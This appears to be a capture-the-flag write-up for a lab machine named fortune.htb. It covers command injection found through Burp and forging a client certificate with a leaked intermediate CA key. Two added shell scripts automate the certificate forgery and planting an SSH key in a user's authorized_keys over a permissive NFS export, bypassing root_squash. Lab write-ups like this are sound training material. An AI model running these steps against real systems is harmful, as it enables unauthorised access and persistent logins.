Nmap scan:
Dirb scan:
Browsing the site gives us this:
Responses come back with some generated fortune-cookie advice:
Let's catch that request in Burp and see what we can make of it.
Db=fortunes2…
Send this request to Repeater and play with it.
Gotcha:
Found 3 users:
Interesting directories:
cat fortuned.py:
Found a .pem file in bob’s directory:
Copied it to our own Kali box and used the .pem file with ssh to connect.
Tried playing with it, but without success.
Tried a bolder approach:
Found the intermediate key files, so the plan is now to create our own certificate and sign it with the intermediate key.
Searching the forum I found this interesting link:
TODO: next
Plan 2:
Found the ca.key file, try copying it.
Found server.crt.
Created the p12 file from server.crt and the intermediate.key.pem file.
Imported that p12 file into Firefox and connected to port 443 via https://fortune.htb/
After that we got an RSA key for the SSL connection; using that key we got a shell, but couldn't do anything in it.
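The plan from above (issue our own certificate, sign it with the leaked intermediate key, and bundle it into a p12 for Firefox), as an added example that is not part of the original writeup. Everything here is constructed locally: the root CA stands in for the box's ca.key, the intermediate key and cert stand in for intermediate.key.pem / intermediate.cert.pem, and the CN "attacker", the bundle name and the password are assumptions. The last step shows why the intermediate has to be in the bundle: the server trusts the root, and the leaf only chains to the root through the intermediate.

```sh
#!/bin/sh
# Added example (not from the original writeup): mint a client certificate with a
# leaked intermediate CA key and pack it into PKCS#12 for import into a browser.
# All keys and certs below are generated here; none of them come from the box.
set -e
WORK="${WORK:-$(mktemp -d)}"

# Build root -> intermediate -> client and export client.p12.
# Returns 0 when the client certificate verifies against the root via the intermediate.
build_client_p12() (
  cd "$WORK"
  # Constructed root CA: stand-in for ca.key / the trust anchor the server uses.
  openssl req -x509 -newkey rsa:2048 -nodes -days 30 -subj '/CN=Constructed Root CA' \
    -keyout ca.key -out ca.crt 2>/dev/null
  # Constructed intermediate: the key we "found". It must carry CA:TRUE or nothing it
  # signs will verify.
  printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign,cRLSign\n' > int.ext
  openssl req -new -newkey rsa:2048 -nodes -subj '/CN=Constructed Intermediate CA' \
    -keyout intermediate.key.pem -out intermediate.csr 2>/dev/null
  openssl x509 -req -days 30 -in intermediate.csr -CA ca.crt -CAkey ca.key \
    -CAcreateserial -extfile int.ext -out intermediate.cert.pem 2>/dev/null
  # Our client certificate, signed with the intermediate key. The subject is arbitrary
  # unless the server maps the CN to a user.
  printf 'basicConstraints=CA:FALSE\nextendedKeyUsage=clientAuth\n' > client.ext
  openssl req -new -newkey rsa:2048 -nodes -subj '/CN=attacker' \
    -keyout client.key -out client.csr 2>/dev/null
  openssl x509 -req -days 30 -in client.csr -CA intermediate.cert.pem \
    -CAkey intermediate.key.pem -CAcreateserial -extfile client.ext -out client.crt 2>/dev/null
  # PKCS#12 bundle: our key, our cert and the intermediate cert, so the browser can
  # present the whole chain during the TLS handshake.
  openssl pkcs12 -export -inkey client.key -in client.crt -certfile intermediate.cert.pem \
    -name 'fortune client' -passout pass:changeit -out client.p12
  # What the server's verification amounts to: leaf, untrusted intermediate, trusted root.
  openssl verify -CAfile ca.crt -untrusted intermediate.cert.pem client.crt >/dev/null
)

# Number of certificates inside the bundle (expect 2: client + intermediate).
p12_cert_count() (
  cd "$WORK"
  openssl pkcs12 -in client.p12 -passin pass:changeit -nokeys 2>/dev/null \
    | grep -c 'BEGIN CERTIFICATE'
)

# Same leaf checked against the root alone: fails, because the intermediate is missing.
chains_without_intermediate() (
  cd "$WORK"
  openssl verify -CAfile ca.crt client.crt >/dev/null 2>&1
)

if [ "${1:-}" = run ]; then
  build_client_p12 && echo "client.p12 written to $WORK ($(p12_cert_count) certs)"
fi
```

Run it as `sh make_client_cert.sh run` (file name assumed) and import client.p12 with the password given above. If the server only trusted the leaf's immediate issuer, or if the bundle were exported without -certfile, the handshake would fail with an unknown-CA alert rather than a shell.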
After some trial and error we decided to enumerate again, starting with an nmap scan, and saw different results than before...
We now see NFS (port 2049, via RPC) open; a permissive NFS export is a well-known way in:
https://resources.infosecinstitute.com/exploiting-nfs-share/
With showmount -e fortune.htb we see there is a share 'home' accessible to everyone.
-> We mount this share under /mnt but run into a problem: we tried accessing it as root, while the server squashes root to nobody (root_squash), so root on our box gets no further than the normal-user shell we already have on the box. Other UIDs are passed through unchanged, so the fix is to create a normal local user (with the same UID as the owner of the home directory we want) and access the share as that account.
```
mount -t nfs fortune.htb:/home /mnt -o nolock
```
That works: we see the same directories we reached through Burp, but now we can get into charlie's folder too.
Here we see there is an authorized_keys file, so we can add our own key: generate an SSH key pair with ssh-keygen,
add the .pub output to authorized_keys, and pass the private key to ssh with -i.
From here we have a shell as charlie and can read everything under /home.
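The NFS steps above, as an added example that is not part of the original writeup. The host, export path and mountpoint are the ones from the writeup; the account name, key paths and the RUN_AGAINST_BOX switch are assumptions. The mount and useradd steps need root and the box, so they only run when asked for; the key-planting function is exercised on a local directory standing in for the mounted home.

```sh
#!/bin/sh
# Added example (not from the original writeup): plant our own SSH public key in a home
# directory exported over NFS, working around root_squash by using a matching UID.
set -e

# List exports and mount /home. nolock avoids needing a lock daemon on our side.
mount_home() {            # $1 = NFS server, $2 = local mountpoint
  showmount -e "$1"
  mount -t nfs "$1:/home" "$2" -o nolock
}

# Numeric UID owning a path on the share. User names do not travel across hosts,
# only UIDs do, so work with the number.
owner_uid() {             # $1 = path, e.g. /mnt/charlie
  ls -ldn "$1" | awk '{print $3}'
}

# root_squash maps our root to nobody, but any other UID is passed through unchanged:
# a local account with the owner's UID is treated as the owner by the NFS server.
ensure_local_uid() {      # $1 = uid, $2 = name to use if the account must be created
  if getent passwd "$1" >/dev/null 2>&1; then
    getent passwd "$1" | cut -d: -f1
  else
    useradd -u "$1" -M -s /bin/sh "$2"
    printf '%s\n' "$2"
  fi
}

# Append our public key to <home>/.ssh/authorized_keys exactly once, with the modes
# sshd's StrictModes requires (.ssh 700, authorized_keys 600). Prints the key count.
inject_key() {            # $1 = home dir on the share, $2 = our .pub file
  home="$1"; pub="$2"
  mkdir -p "$home/.ssh"
  chmod 700 "$home/.ssh"
  ak="$home/.ssh/authorized_keys"
  touch "$ak"
  if ! grep -qF -- "$(cat "$pub")" "$ak"; then
    printf '%s\n' "$(cat "$pub")" >> "$ak"
  fi
  chmod 600 "$ak"
  grep -c '' "$ak"
}

# Full run against the box (needs root locally for mount/useradd). Not run by default.
case "${1:-}" in
  inject) inject_key "$2" "$3" ;;
  box)
    mount_home fortune.htb /mnt
    uid=$(owner_uid /mnt/charlie)
    user=$(ensure_local_uid "$uid" charlie)
    ssh-keygen -t ed25519 -N '' -f /tmp/charlie_key
    # Write as the matching UID, not as (squashed) root, or the write is denied.
    su "$user" -s /bin/sh -c "sh '$0' inject /mnt/charlie /tmp/charlie_key.pub"
    ssh -i /tmp/charlie_key charlie@fortune.htb
    ;;
esac
```

Invoke it as `sh nfs_key.sh box` (file name assumed). The permission fix-up matters: sshd silently ignores an authorized_keys file that is group- or world-writable, which is easy to end up with when the file is created through a mount.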
Now onto priv esc.
Read access to passwd
Read access to pgAdmin4.db
There should be a server.db and a user.db.
From here we can get the encrypted passwords together with their salts(?)
Decrypt those together and we have the password.
